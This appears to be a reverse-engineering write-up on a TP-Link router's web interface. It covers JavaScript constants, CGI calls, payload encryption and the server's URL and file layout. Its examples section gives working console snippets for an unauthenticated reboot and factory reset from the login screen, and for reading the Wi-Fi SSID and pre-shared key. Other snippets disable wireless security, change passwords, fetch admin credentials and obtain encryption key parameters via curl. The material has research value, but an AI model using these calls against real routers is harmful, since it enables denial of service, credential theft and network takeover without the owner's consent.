var XTP_MULTIISP_CODEC = "XTP_MULTIISP_CODEC"
var XTP_MULTIISP_CODEC_LIST = "XTP_MULTIISP_CODEC_LIST"
var VOICE_PROF_LINE = "VOICE_PROF_LINE"
var VOICE_PROF_LINE_SIP = "VOICE_PROF_LINE_SIP"
var VOICE_PROF_LINE_XTPUSBVM = "VOICE_PROF_LINE_XTPUSBVM"
var VOICE_PROF_LINE_CALLFEAT = "VOICE_PROF_LINE_CALLFEAT"
var VOICE_PROF_LINE_PROC = "VOICE_PROF_LINE_PROC"
var VOICE_PROF_LINE_CODEC = "VOICE_PROF_LINE_CODEC"
var VOICE_PROF_LINE_CODEC_LIST = "VOICE_PROF_LINE_CODEC_LIST"
var VOICE_PROF_LINE_STATS = "VOICE_PROF_LINE_STATS"
var XTP_FEATURE_CODE = "XTP_FEATURE_CODE"
var VOICE_PHY_INTERFACE = "VOICE_PHY_INTERFACE"
var VOICE_PHYINTERFACE_TESTS = "VOICE_PHYINTERFACE_TESTS"
var XTP_VOICE_MULTI_ISPDIALPLAN = "XTP_VOICE_MULTI_ISPDIALPLAN"
var XTP_VOICE_PSTN = "XTP_VOICE_PSTN"
var STORAGE_SERVICE = "STORAGE_SERVICE"
var CAPABLE = "CAPABLE"
var USER_ACCOUNT = "USER_ACCOUNT"
var USB_DEVICE = "USB_DEVICE"
var LOGICAL_VOLUME = "LOGICAL_VOLUME"
var FOLDER_BROWSE = "FOLDER_BROWSE"
var FOLDER_NODE = "FOLDER_NODE"
var DLNA_MEDIA_SERVER = "DLNA_MEDIA_SERVER"
var DLNA_MEDIA_SERVER_FOLDER = "DLNA_MEDIA_SERVER_FOLDER"
var SMB_SERVICE = "SMB_SERVICE"
var SMB_SERVICE_FOLDER = "SMB_SERVICE_FOLDER"
var SMB_USER_ACCESS = "SMB_USER_ACCESS"
var FTP_SERVER = "FTP_SERVER"
var FTP_SERVER_FOLDER = "FTP_SERVER_FOLDER"
var FTP_USER_ACCESS = "FTP_USER_ACCESS"
var XTP_PRINT_SERVICE = "XTP_PRINT_SERVICE"
var XTP_IGD_CALL_FIREWALL_CFG = "XTP_IGD_CALL_FIREWALL_CFG"
var XTP_IGD_SPEED_DIAL_CFG = "XTP_IGD_SPEED_DIAL_CFG"
var XTP_IGD_MULTI_ISP_DIAL_PLAN = "XTP_IGD_MULTI_ISP_DIAL_PLAN"
var XTP_IGD_MULTIISPDP_LIST = "XTP_IGD_MULTIISPDP_LIST"
var XTP_CALLLOGCFG = "XTP_CALLLOGCFG"
var IPSEC = "IPSEC"
var IPSEC_CFG = "IPSEC_CFG"
var SYS_MODE = "SYS_MODE"
var EWAN = "EWAN"
var USER_INFO = "USER_INFO"
var GPON_USER_INFO = "GPON_USER_INFO"
var GPON_AUTH_CTC = "GPON_AUTH_CTC"
var GPON_AUTH_SN = "GPON_AUTH_SN"
var GPON_AUTH_PWD = "GPON_AUTH_PWD"
var GPON_MAC_INFO = "GPON_MAC_INFO"
var GPON_FWD_RULE = "GPON_FWD_RULE"
var GPON_LOCAL_RULE_ENTRY = "GPON_LOCAL_RULE_ENTRY"
var GPON_REMOTE_RULE_ENTRY = "GPON_REMOTE_RULE_ENTRY"
var GPON_OMCI_IOT = "GPON_OMCI_IOT"
var GPON_OMCI_IOT_ENTRY = "GPON_OMCI_IOT_ENTRY"
var GPON_OMCI_ME_ATTR = "GPON_OMCI_ME_ATTR"
var CLOUD_SERVICE = "CLOUD_SERVICE"
var FW_UPGRADE_INFO = "FW_UPGRADE_INFO"
var CLOUD_USER_ACCOUNT = "CLOUD_USER_ACCOUNT"
var OWNER_INFO = "OWNER_INFO"
var CURRENT_USER_INFO = "CURRENT_USER_INFO"
var CLOUD_DDNS = "CLOUD_DDNS"
var CLOUD_DDNS_ENTRY = "CLOUD_DDNS_ENTRY"
var WAN_BLOCK = "WAN_BLOCK"
var WAN_ERROR_BLOCK = "WAN_ERROR_BLOCK"
var FW_UP_INFO_BLOCK = "FW_UP_INFO_BLOCK"
var IPPING_DIAG = "IPPING_DIAG"
var TRACEROUTE_DIAG = "TRACEROUTE_DIAG"
var SDMZ_CFG = "SDMZ_CFG"
var WEB_CFG = "WEB_CFG"
var VLAN = "VLAN"
var ISP_SERVICE = "ISP_SERVICE"
var WOL = "WOL"
var WOL_ITEM = "WOL_ITEM"
var IPV6_CFG = "IPV6_CFG"
var SYS_STATE = "SYS_STATE"
var IPV6_PASS_THROUGH = "IPV6_PASS_THROUGH"
var AUTO_REBOOT_CFG = "AUTO_REBOOT_CFG"
var CPU_MEM = "CPU_MEM"
var PRODUCE_INFO = "PRODUCE_INFO"
var MULTIMODE = "MULTIMODE"
var MULTIMODE_AP = "MULTIMODE_AP"
var AP_CONFIG_WEPKEY = "AP_CONFIG_WEPKEY"
var AP_SNMP_CFG = "AP_SNMP_CFG"
var MULTIMODE_CLIENT = "MULTIMODE_CLIENT"
var MULTIMODE_RE = "MULTIMODE_RE"
var RE_CONFIG_WEPKEY = "RE_CONFIG_WEPKEY"
var MULTIMODE_ROUTER = "MULTIMODE_ROUTER"
var ROUTER_CONFIG_WEPKEY = "ROUTER_CONFIG_WEPKEY"
var ROUTER_CONFIG_MULTISSID = "ROUTER_CONFIG_MULTISSID"
var ROUTER_CONFIG_MSSIDENTRY = "ROUTER_CONFIG_MSSIDENTRY"
var MULTIMODE_MSSID = "MULTIMODE_MSSID"
var MSSID_CONFIG_MULTISSID = "MSSID_CONFIG_MULTISSID"
var MSSID_CONFIG_MSSIDENTRY = "MSSID_CONFIG_MSSIDENTRY"
var MULTIMODE_HOTSPOT = "MULTIMODE_HOTSPOT"
var PING_WATCH_DOG = "PING_WATCH_DOG"
var LED_CONTROL = "LED_CONTROL"
var NEW_SDMZ_CFG = "NEW_SDMZ_CFG"
var INCLUDE_MULTI_LANGUAGE_Q=0
var INCLUDE_LOGIN_GDPR_ENCRYPT=1
var INCLUDE_WAN_LAN_STATUS=1
var INCLUDE_MULTIMODE_MODEM=0
var INCLUDE_MULTIMODE_RE=1
var WEB_INCLUDE_TEST=0
var WEB_INCLUDE_MULTI_EWAN=0
var WEB_INCLUDE_DST=1
var WEB_QS_CHANGEPASSWORD=1
var INCLUDE_IP6_WAN_NOT_ASSIGN_ADDR=0
var INCLUDE_UN_IPTV=0
var INCLUDE_SCHEDULE_NEW=0
var INCLUDE_HW_NAT=0
var INCLUDE_LED_CONTROL=0
var INCLUDE_MULTILANGUAGE=0
var INCLUDE_FEEDBACK=0
var INCLUDE_WOL=0
var INCLUDE_MULTILOCALCOEX=0
var INCLUDE_WEBUI_SUPPORT=1
var INCLUDE_FORCE_TIMEZONE_SELECT=0
var INCLUDE_FORCE_REGION_SELECT=0
var INCLUDE_WLAN_REGION_LIST=0
var INCLUDE_MULTIPLE_LOCALIZATION=0
var INCLUDE_SCAN_ALL_CHANNELS=0
var INCLUDE_WDS_DUALBAND_DYNSWITCH=0
var INCLUDE_LOCK_TO_AP=1
var INCLUDE_LAN_WLAN=1
var INCLUDE_VOIP
var INCLUDE_FXS_NUM
var INCLUDE_CALLLOG
var INCLUDE_USB_VOICEMAIL
var INCLUDE_PSTN
var INCLUDE_PSTN_GATEWAY
var INCLUDE_PSTN_LIFELINE
var INCLUDE_BRIDGING=1
var INCLUDE_IGMP=1
var INCLUDE_ETHERNET_WAN=1
var INCLUDE_WAN_LAN_STATUS=1
var INCLUDE_SNMP=1
var INCLUDE_RIP
var INCLUDE_DDNS_PH
var INCLUDE_LAN_WLAN_MSSID=1
var INCLUDE_LAN_WLAN_WDS=1
var INCLUDE_IPTV
var INCLUDE_CWMP
var INCLUDE_DYNDNS=1
var INCLUDE_USB
var INCLUDE_USB_STORAGE
var INCLUDE_USB_MEDIA_SERVER
var INCLUDE_USB_SAMBA_SERVER
var INCLUDE_USB_FTP_SERVER
var INCLUDE_USB_OVER_IP
var INCLUDE_ADSLWAN
var INCLUDE_AUTO_PVC
var INCLUDE_IPV6=1
var INCLUDE_IPV6_SLAAC=1
var INCLUDE_IPV6_AUTO=1
var INCLUDE_SPECIAL_DIAL_MODE
var INCLUDE_WAN_MODE=1
var INCLUDE_IPSEC
var INCLUDE_NOIPDNS=1
var INCLUDE_ALG_H323=1
var INCLUDE_ALG_SIP=1
var INCLUDE_PON_ETH_WAN
var INCLUDE_EPON_INFO
var INCLUDE_GPON_INFO
var INCLUDE_QOS
var INCLUDE_E8_APP
var INCLUDE_TFC_PERU
var INCLUDE_USB_3G_DONGLE
var INCLUDE_LAN_WLAN_SCHEDULE=1
var INCLUDE_ROUTE_BINDING
var INCLUDE_LAN_WLAN_GUESTNETWORK=1
var INCLUDE_LAN_WLAN_DUALBAND
var INCLUDE_LAN_WLAN_HWSWITCH
var INCLUDE_LAN_WLAN_AC=1
var INCLUDE_LAN_WLAN_WDS_DETECT
var INCLUDE_L2TP=1
var INCLUDE_PPTP=1
var INCLUDE_IPV6_MLD=1
var INCLUDE_ACL
var INCLUDE_ACL_ADVANCE
var INCLUDE_DUAL_ACCESS=1
var INCLUDE_WAN_TYPE_DETECT=1
var INCLUDE_BPA=1
var INCLUDE_CMXDNS=1
var INCLUDE_IPPING_DIAG=1
var INCLUDE_TRACEROUTE_DIAG=1
var INCLUDE_LAN_WLAN_QUICKSAVE
var INCLUDE_IGMP_FORCEVERSION=1
var INCLUDE_PORTABLE_APP=1
var DEFAULT_NO_SPEC=1
var INCLUDE_MEXICO_SPEC
var INCLUDE_CANADA_SPEC
var INCLUDE_JAPAN_SPEC
var INCLUDE_KOREA_SPEC
var INCLUDE_PL_SPEC
var INCLUDE_BR_SPEC
var INCLUDE_ROMANIA_SPEC
var INCLUDE_RUSSIA_SPEC
var INCLUDE_US_SPEC
var INCLUDE_VN_SPEC
var INCLUDE_VIETNAM_FPT
var INCLUDE_TW_SPEC
var INCLUDE_ES_SPEC
var INCLUDE_X_TP_VLAN=1
var INCLUDE_FORBID_WAN_PING=1
var INCLUDE_SMART_DHCP=1
var INCLUDE_MIC=1
var INCLUDE_IPV6_PASS_THROUGH
var INCLUDE_AUTOREBOOT=1
var INCLUDE_CPUMEM_INFO
var INCLUDE_MULTIMODE_RE=1
var INCLUDE_MULTIMODE_AP=1
var INCLUDE_MULTIMODE_CLIENT=1
var INCLUDE_MULTIMODE=1
var INCLUDE_PING_WATCHDOG=1
var INCLUDE_MULTIMODE_ROUTER=1
var INCLUDE_MULTIMODE_MSSID
var INCLUDE_YANDEX_DNS
var INCLUDE_LED_CONTROL
var INCLUDE_MULTILANGUAGE
var INCLUDE_FORCE_TIMEZONE_SELECT
var INCLUDE_FORCE_REGION_SELECT
var INCLUDE_MULTIMODE_HOTSPOT=1
var INCLUDE_WLAN_REGION_LIST
var INCLUDE_FBWIFI
var INCLUDE_CLOUD
var INCLUDE_WANIP_BINDING
var INCLUDE_HTTPS_SSL=1
var INCLUDE_LAN_AP_GATEWAY=1
var INCLUDE_US_FOR_KR_SPEC
var INCLUDE_WOL
var INCLUDE_NEW_SDMZ
var INCLUDE_DMZ
var INCLUDE_SDMZ
Note: While debugging CGI calls, the server returns an error numeric code. A successfull request returns
$.ret=0. Other ret code's meaning can be easily resolved using the err.js.Note: The JS files mentioned up to this point (
lib.js, oid_str.js, err.js) are all accessible without any authorisation in the werservers /js directory and define the basic functionality of the web interface.The easiest to get starting, is by learning from examples, and there are tons of them. Most of them can be found by analysing commands that are integraded within the webpage. If the
/web directory has already been aquired and locally available, a simple command (grep -rnw './web' -e '$.act'), will reveal almost 2000 examples, spread over all documents. The other option is to use the browser's developer options. Choose element selection option (macOS: ⇧+⌘+C) an click any button. All forms on the webpage have onclick="functionName()" events present. Then type functionName without brackets into the browser console and press enter. Double click on the result. This brings you straight to the file containing the function in question. I only explain this, because the page uses multiple iframes, which makes manual search a bit harder. In the following a very simple example function, which has been used as my entry point and also used in the following Examples Section.function doRestart()
{
if(confirm(c_str.creboot))
{
$.guage(["<span class='T T_rebooting'>"+s_str.rebooting+"</span>", "<span class='T T_wait_reboot'>"+s_str.wait_reboot+"</span>",], 100, $.guageInterval, function(){window.parent.$.refresh();});
$.act(ACT_OP, ACT_OP_REBOOT);
$.exe(true);
}
}
Note: On the older firmware, ALL information are transmitted creartext and unencrypted over the network. The newer firmware encrypts the payload, but still uses unencrypted http connection.
Examples
ⓘ Unauthorized Reboot that works from the login screen
// Firmware: 170828
$.act(ACT_OP, ACT_OP_REBOOT); $.exe();
ⓘ Unauthorized Factory Reset that works from the login screen
// Firmware 170828
$.act(ACT_OP, ACT_OP_FACTORY_RESET); $.act(ACT_OP, ACT_OP_REBOOT); $.exe();
Note: A factory reset, also needs a reboot to become active.
ⓘ Get all LAN_WLAN object attributes
// Firmware: 170828
$.act(ACT_GL, LAN_WLAN); $.exe();
ⓘ Example LAN_WLAN object attributes
[1,1,0,0,0,0]0
__syncApStatus=0
__apLastStatus=3
__hwWifiStatus=0
enable=1
status=Up
name=wlan0
BSSID=74:DA:88:FC:C3:AE
channel=3
autoChannelEnable=1
X_TP_PreSSID=TP-Link
SSID=TP-Link_C3AE
beaconType=11i
MACAddressControlEnabled=0
X_TP_MACAddressControlRule=deny
X_TP_MACTableSize=0
X_TP_Configuration_Modified=0
X_TP_Band=2.4GHz
X_TP_Bandwidth=Auto
standard=n
WEPKeyIndex=1
WEPEncryptionLevel=Disabled,40-bits,104-bits
basicEncryptionModes=None
basicAuthenticationMode=None
WPAEncryptionModes=TKIPandAESEncryption
WPAAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
IEEE11iAuthenticationMode=PSKAuthentication
X_TP_PreSharedKey=09960466
X_TP_GroupKeyUpdateInterval=0
possibleChannels=
basicDataTransmitRates=2,11,6,18,24,48,54,60,90,120,150,90,120,240,450,60,120,240,480,
operationalDataTransmitRates=
possibleDataTransmitRates=5.5,11,12,24,36,135,150,30,60,240,270,300,45,450,60,120,240,480,
SSIDAdvertisementEnabled=1
transmitPowerSupported=100,50,20
transmitPower=100
regulatoryDomain=DE
deviceOperationMode=InfrastructureAccessPoint
X_TP_RadiusServerIP=
X_TP_RadiusServerPort=1812
X_TP_RadiusServerPassword=
WMMEnable=1
X_TP_BeaconInterval=100
X_TP_RTSThreshold=2346
X_TP_FragmentThreshold=2346
X_TP_DTIMFrequency=1
X_TP_IsolateClients=0
X_TP_ShortGIEnable=1
totalAssociations=64
maxStaNum=32
X_TP_ShowRegionSelectionOnWeb=0
[1,2,0,0,0,0]0
__syncApStatus=0
__apLastStatus=3
__hwWifiStatus=0
enable=0
status=Disabled
name=wlan5
BSSID=74:DA:88:FC:C3:AD
channel=40
autoChannelEnable=1
X_TP_PreSSID=TP-Link
SSID=TP-Link_C3AE_5G
beaconType=11i
MACAddressControlEnabled=0
X_TP_MACAddressControlRule=deny
X_TP_MACTableSize=0
X_TP_Configuration_Modified=0
X_TP_Band=5GHz
X_TP_Bandwidth=Auto
standard=ac
WEPKeyIndex=1
WEPEncryptionLevel=Disabled,40-bits,104-bits
basicEncryptionModes=None
basicAuthenticationMode=None
WPAEncryptionModes=TKIPandAESEncryption
WPAAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
IEEE11iAuthenticationMode=PSKAuthentication
X_TP_PreSharedKey=09960466
X_TP_GroupKeyUpdateInterval=0
possibleChannels=
basicDataTransmitRates=
operationalDataTransmitRates=
possibleDataTransmitRates=
SSIDAdvertisementEnabled=1
transmitPowerSupported=100,50,20
transmitPower=100
regulatoryDomain=DE
deviceOperationMode=InfrastructureAccessPoint
X_TP_RadiusServerIP=
X_TP_RadiusServerPort=1812
X_TP_RadiusServerPassword=
WMMEnable=1
X_TP_BeaconInterval=100
X_TP_RTSThreshold=2346
X_TP_FragmentThreshold=2346
X_TP_DTIMFrequency=1
X_TP_IsolateClients=0
X_TP_ShortGIEnable=1
totalAssociations=64
maxStaNum=32
X_TP_ShowRegionSelectionOnWeb=0
[error]0
ⓘ Get SSID and PSK
// Firmware: 170828
$.act(ACT_GL,LAN_WLAN,null,null,["SSID", "X_TP_PreSharedKey"]); $.exe();
// Example Response
[1,1,0,0,0,0]0
SSID=TP-Link_00FC
X_TP_PreSharedKey=37490720
[1,2,0,0,0,0]0
SSID=TP-Link_00FC_5G
X_TP_PreSharedKey=37490720
[error]0
ⓘ Disable WLAN security
// Firmware: 170828
var wlanList=$.act(ACT_GL,LAN_WLAN,null,null,["name", "SSID", "Enable", "X_TP_Configuration_Modified", "beaconType", "Standard", "WEPEncryptionLevel", "WEPKeyIndex", "BasicEncryptionModes", "BasicAuthenticationMode", "WPAEncryptionModes", "WPAAuthenticationMode", "IEEE11iEncryptionModes", "IEEE11iAuthenticationMode", "X_TP_PreSharedKey", "X_TP_GroupKeyUpdateInterval", "X_TP_RadiusServerIP", "X_TP_RadiusServerPort", "X_TP_RadiusServerPassword"]);
$.exe();
wlanObj=wlanList[0];
$.act(ACT_SET,LAN_WLAN,wlanObj.__stack,null,["BeaconType=Basic", "BasicEncryptionModes=None", "BasicAuthenticationMode=None"]); $.exe();
ⓘ Change both WLAN radio passwords
// Firmware: 170828
let password = "1234567890";
var wlanList=$.act(ACT_GL,LAN_WLAN,null,null,["name", "SSID", "Enable", "X_TP_Configuration_Modified", "beaconType", "Standard", "WEPEncryptionLevel", "WEPKeyIndex", "BasicEncryptionModes", "BasicAuthenticationMode", "WPAEncryptionModes", "WPAAuthenticationMode", "IEEE11iEncryptionModes", "IEEE11iAuthenticationMode", "X_TP_PreSharedKey", "X_TP_GroupKeyUpdateInterval", "X_TP_RadiusServerIP", "X_TP_RadiusServerPort", "X_TP_RadiusServerPassword"]);
$.exe();
$.act(ACT_SET,LAN_WLAN,wlanList[0].__stack,null,["BeaconType=11i", "IEEE11iAuthenticationMode=PSKAuthentication", "IEEE11iEncryptionModes=AESEncryption", "X_TP_PreSharedKey="+password,"X_TP_GroupKeyUpdateInterval=0"]);
$.act(ACT_SET,LAN_WLAN,wlanList[1].__stack,null,["BeaconType=11i", "IEEE11iAuthenticationMode=PSKAuthentication", "IEEE11iEncryptionModes=AESEncryption", "X_TP_PreSharedKey="+password,"X_TP_GroupKeyUpdateInterval=0"]);
$.exe();
Note: wlanObj = wlanList[{1, 2}] (0 = 2.4G; 1 = 5G)
Payload Encryption
The newer firmware versions use AES encrypted payload when communicating with the webserver using the
/cgi_gdpr URL instead of /cgi for most calls. In order to analyse the servers responses, one needs to decrypt the payload. While debugging, this can either be done using the instance of the $.Iencryptor used for encryption or by overwriting the $.io(), which logs the response after decryption. Hackers may be able to forge the encryption key with the help of /cgi/getParm. Additionnally the modified version of the $.io() function prevents reloading the page while testing unautharized CGI calls from the login screen.ⓘ Example AES Decryption using $.Iencryptor
$.Iencryptor.AESDecrypt("QCN4Rv6QexPOxOxIs7adng==");
// var encryptor = $.encrypt.encryptManager.genEncryptor(); //生成加密器
// encryptor.genAESKey(); //生成aes密码
// encryptor.setRSAKey("nn", "ee"); //设置rsakey
// encryptor.setSeq("123"); //设置seq
// encryptor.setHash("用户名", "密码"); //设置用户名密码
//
//
// //以上都设置完后,可进行加密
// encryptor.AESEncrypt(data);
//
// //返回对象
// // {
// // data:"加密后数据",
// // sign: "签名"
// // }
//
//
// // 页面刷新前保存加密器
// $.encrypt.encryptManager.recordEncryptor();
//
// //再次获取加密器
// var encryptor = $.encrypt.encryptManager.getEncryptor();
Note: 感谢您的良好指示 🙏
ⓘ Example AES key generation
$.act(ACT_CGI, "/cgi/getParm");
$.exe(null,false,0);
# Request Parameters
# [/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0
# Or, using cURL
# curl -X POST "http://192.168.1.1/cgi?8" -H "Referer: http://192.168.1.1" -d $'[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'
# Example Response
# lib.js:396 XHR finished loading: POST "http://192.168.1.1/cgi?8"
# [cgi]0
# var ee="010001";
# var nn="BF52337CDDC3F46ADE7663765F170AB464AE93BF981B02B95FCE1E94" +
# "62DD9A03ED3E09CCEFDFD7FACE81EE38136FC081735686FE630BBADB" +
# "DAB24BE0443A2B25";
# var seq="812508797";
# $.ret=0;
# [error]0
$.nn = nn;
$.ee = ee;
$.seq = seq;
$.Iencryptor.setSeq($.seq);
$.Iencryptor.setRSAKey($.nn, $.ee);
$.Iencryptor.setHash(userName, password);
$.Iencryptor.genAESKey();
ⓘ $.io() {Log decrypted responses while debugging and disable page reloading}
$.io = function(path, bScript, hook, data, noquit, unerr) {
$.ajax(
{
type: data ? "POST" : "",
url: path,
bScript: bScript,
async: true,
data: data ? data : null,
success: r => console.log(r),
error: e => console.log(e)
});
}
// Try the modifications (Reload to revert)
$.act(ACT_GET, USER_CFG, null, null, ["adminName", "adminPwd"]);
$.exe(null, false, 1);
Note: The third parameter with the
$.exe(null, false, 1); function defines the securityLevel. 1 enables AES encryption and the use of /cgi_gdpr. 0 means no encryption and the use of /cgi.Information Gathering
ⓘ CGI URLs
// Source: /usr/bin/httpd
// Firmware: 191018
/cgi/conf.bin
/cgi/confencode
/cgi/confup
/cgi/bnr
/cgi/softup
/cgi/softburn
/cgi/log
/cgi/info
/cgi/lanMac
/cgi/auth
/cgi/pvc
/cgi/ansi
/cgi/usb3gup
/cgi/usb3gupburn
/cgi/logout
/cgi/route
/cgi/updateWlThroughput
/cgi/updateWlThroughput5G
/cgi/getParm
/cgi/login
/cgi_gdpr
ⓘ Webserver URLs
// Firmware: 191018
/web
├── MenuRpm.htm
├── css
│ ├── ban.css
│ ├── css_help.css
│ ├── ie6.css
│ ├── ie7.css
│ ├── ie8.css
│ ├── main.css
│ ├── menu.css
│ ├── other.css
│ ├── qr.css
│ └── top.css
├── domain-redirect.htm
├── frame
│ ├── accErr.htm
│ ├── banner.htm
│ ├── login.htm
│ ├── menu.htm
│ └── top.htm
├── help
│ ├── AccessCtrlAccessRulesAdvHelpRpm.htm
│ ├── AccessCtrlAccessRulesHelpRpm.htm
│ ├── AccessCtrlAccessTargetsAdvHelpRpm.htm
│ ├── AccessCtrlAccessTargetsHelpRpm.htm
│ ├── AccessCtrlHostsListsAdvHelpRpm.htm
│ ├── AccessCtrlHostsListsHelpRpm.htm
│ ├── AccessCtrlTimeSchedAdvHelpRpm.htm
│ ├── AccessCtrlTimeSchedHelpRpm.htm
│ ├── AssignedIpAddrListHelpRpm.htm
│ ├── BackNRestoreHelpRpm.htm
│ ├── BasicSecurityHelpRpm.htm
│ ├── BpaCfgHelpRpm.htm
│ ├── ChangeLoginPwdHelpRpm.htm
│ ├── DMZHelpRpm.htm
│ ├── DateTimeCfgHelpRpm.htm
│ ├── DdnsAddComexeHelpRpm.htm
│ ├── DiagHelp.htm
│ ├── DualBandSelectionHelpRpm.htm
│ ├── DynDdnsHelpRpm.htm
│ ├── FeedbackHelp.htm
│ ├── FixMapCfgHelpRpm.htm
│ ├── GuestNetUsbCfgHelpRpm.htm
│ ├── GuestNetWirelessCfgHelpRpm.htm
│ ├── GuestNetWirelessCfgHelpRpmWithFacebook.htm
│ ├── IPTVHelp.htm
│ ├── IPv6LanHelp.htm
│ ├── IPv6StatusHelpRpm.htm
│ ├── IPv6TunnelHelp.htm
│ ├── L2tpCfgHelpRpm.htm
│ ├── LanArpBindingHelpRpm.htm
│ ├── LanArpBindingListHelpRpm.htm
│ ├── LanDhcpServerHelpRpm.htm
│ ├── LanDhcpServerHelpRpm_AP.htm
│ ├── LocalManageControlHelpRpm.htm
│ ├── MacCloneCfgHelpRpm.htm
│ ├── ManageControlHelpRpm.htm
│ ├── ManageCtrl_h.htm
│ ├── MediaServerCfgHelpRpm.htm
│ ├── MiscHelpRpm.htm
│ ├── NasCfgHelpRpm.htm
│ ├── NasFtpCfgHelpRpm.htm
│ ├── NasUserAdvRpm.htm
│ ├── NasUserCfgHelpRpm.htm
│ ├── NatStatusCfgHelpRpm.htm
│ ├── NetworkCfgHelpRpm.htm
│ ├── NetworkCfgHelpRpm_AP.htm
│ ├── NoipDdnsHelpRpm.htm
│ ├── PPPoECfgHelpRpm.htm
│ ├── PPPoEv6CfgHelpRpm.htm
│ ├── ParentCtrlAdvHelpRpm.htm
│ ├── ParentCtrlHelpRpm.htm
│ ├── PingHelpRpm.htm
│ ├── PingWatchDogHelpRpm.htm
│ ├── PptpCfgHelpRpm.htm
│ ├── PrintServerCfgHelpRpm.htm
│ ├── QoSCfgHelpRpm.htm
│ ├── QoSRuleCfgHelpRpm.htm
│ ├── QoSRuleListHelpRpm.htm
│ ├── Qs3gHelpRpm.htm
│ ├── QsChangeLoginPwdHelpRpm.htm
│ ├── QsLanApHelpRpm.htm
│ ├── QsModeHelpRpm.htm
│ ├── QsMultissidHelpRpm.htm
│ ├── QsReviewHelpRpm.htm
│ ├── QsWlClientHelpRpm.htm
│ ├── QsWlScanClientHelpRpm.htm
│ ├── RestoreDefaultCfgHelpRpm.htm
│ ├── SiteSurveyHelpRpm.htm
│ ├── SnmpHelpRpm.htm
│ ├── SoftwareUpgradeHelpRpm.htm
│ ├── SpecialAppHelpRpm.htm
│ ├── StaticRouteTableHelpRpm.htm
│ ├── StatusHelpRpm.htm
│ ├── StatusHelpRpm_AP.htm
│ ├── StatusHelpRpm_Client.htm
│ ├── StatusHelpRpm_Modem.htm
│ ├── StatusHelpRpm_Repeater.htm
│ ├── SysAutoRebootHelpRpm.htm
│ ├── SysRebootHelpRpm.htm
│ ├── SysRouteTableHelpRpm.htm
│ ├── SystemLogHelpRpm.htm
│ ├── SystemStatisticHelpRpm.htm
│ ├── UpnpCfgHelpRpm.htm
│ ├── Usb3gHelpRpm.htm
│ ├── Usb3gModemListHelpRpm.htm
│ ├── UsbAccountHelp.htm
│ ├── UsbDlnaHelp.htm
│ ├── UsbFtpHelp.htm
│ ├── UsbMassHelp.htm
│ ├── UsbSharingHelp.htm
│ ├── VirtualServerHelpRpm.htm
│ ├── Wan6DisabledCfgHelpRpm.htm
│ ├── Wan6to4TunnelCfgHelpRpm.htm
│ ├── WanDynamicIpCfgHelpRpm.htm
│ ├── WanDynamicIpV6CfgHelpRpm.htm
│ ├── WanStaticIpCfgHelpRpm.htm
│ ├── WanStaticIpV6CfgHelpRpm.htm
│ ├── WlanAdvHelpRpm.htm
│ ├── WlanAdvHelpRpm_AP.htm
│ ├── WlanConnectHelpRpm.htm
│ ├── WlanExtender5GHelpRpm.htm
│ ├── WlanExtenderHelpRpm.htm
│ ├── WlanMacFilterHelpRpm.htm
│ ├── WlanNetworkHelpRpm.htm
│ ├── WlanNetworkHelpRpm_AP.htm
│ ├── WlanNetworkHelpRpm_MSSID.htm
│ ├── WlanSchedule.htm
│ ├── WlanSecurityHelpRpm.htm
│ ├── WlanStationHelpRpm.htm
│ ├── WlanThroughputHelpRpm.htm
│ ├── WlanWpsChkModeHelpRpm.htm
│ ├── WlanWpsHelpRpm.htm
│ ├── WlanWpsHelpRpm_AP.htm
│ ├── WzdAccessCtrlHostAddHelpRpm.htm
│ ├── WzdAccessCtrlRuleAddHelpRpm.htm
│ ├── WzdAccessCtrlSchedAddHelpRpm.htm
│ ├── WzdAccessCtrlTargetAddHelpRpm.htm
│ ├── WzdConfirmHelpRpm.htm
│ ├── WzdFinishHelpRpm.htm
│ ├── WzdL2TPHelpRpm.htm
│ ├── WzdPPPoEHelpRpm.htm
│ ├── WzdPPTPHelpRpm.htm
│ ├── WzdStartHelpRpm.htm
│ ├── WzdStaticIpHelpRpm.htm
│ ├── WzdWanMACHelpRpm.htm
│ ├── WzdWanTypeHelpRpm.htm
│ ├── WzdWlanHelpRpm.htm
│ ├── WzdWlanHelpRpm_AP.htm
│ ├── YandexDnsHelpRpm.htm
│ └── ledControlHelp.htm
├── img
│ ├── Thumbs.db
│ ├── bgColor.jpg
│ ├── check.gif
│ ├── col_hide.gif
│ ├── col_show.gif
│ ├── empty.gif
│ ├── error.gif
│ ├── helpPic.gif
│ ├── icon.jpg
│ ├── loading.gif
│ ├── login
│ │ ├── domain-redirect.png
│ │ ├── favicon.ico
│ │ ├── info.png
│ │ ├── input-box.png
│ │ ├── input-box1.png
│ │ ├── loginBg.png
│ │ ├── loginButton.png
│ │ ├── loginButton1.png
│ │ ├── logo.png
│ │ ├── ok.png
│ │ ├── password.png
│ │ ├── qr.png
│ │ ├── top-right.png
│ │ ├── tp-beta-mark.png
│ │ ├── username.png
│ │ └── wrong.png
│ ├── mark_copy.gif
│ ├── menu-white-noradius.png
│ ├── menu-white.png
│ ├── menu-yellow.png
│ ├── minus.gif
│ ├── plus.gif
│ ├── pw.gif
│ ├── signalstrength.gif
│ ├── switch.gif
│ └── td-blue.png
├── index.htm
├── js
│ ├── 3g.js
│ ├── cryptoJS.min.js
│ ├── custom.js
│ ├── encrypt.js
│ ├── err.js
│ ├── help.js
│ ├── language.js
│ ├── lib.js
│ ├── local.js
│ ├── oid_str.js
│ ├── root.js
│ ├── str.js
│ ├── tpEncrypt.js
│ └── vlancfg.js
├── main
│ ├── alg.htm
│ ├── arpBind.htm
│ ├── arpBindEdit.htm
│ ├── arpList.htm
│ ├── autoPVC.htm
│ ├── backNRestore.htm
│ ├── basicSec.htm
│ ├── clientMode.htm
│ ├── clientMode5G.htm
│ ├── cwmp.htm
│ ├── ddos.htm
│ ├── ddos_host.htm
│ ├── defGateway.htm
│ ├── defGateway6.htm
│ ├── defaultCfg.htm
│ ├── dhcp.htm
│ ├── dhcpAP.htm
│ ├── dhcpClient.htm
│ ├── dhcpCond.htm
│ ├── dhcpCondEdit.htm
│ ├── dhcpEdit.htm
│ ├── dhcpEditAP.htm
│ ├── dhcpStatic.htm
│ ├── dhcpStaticEdit.htm
│ ├── diagnostic.htm
│ ├── div.htm
│ ├── dlnaManage.htm
│ ├── dmz.htm
│ ├── dsl.htm
│ ├── dslcfg.htm
